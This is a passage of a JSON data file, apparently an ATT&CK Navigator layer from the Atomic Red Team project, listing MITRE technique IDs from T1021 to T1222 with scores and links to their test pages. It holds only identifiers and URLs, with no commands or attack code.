Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1037.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1069","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1071","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1087","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1127.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1127","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222","score":100,"enabled":true,"links":[{"label":"View 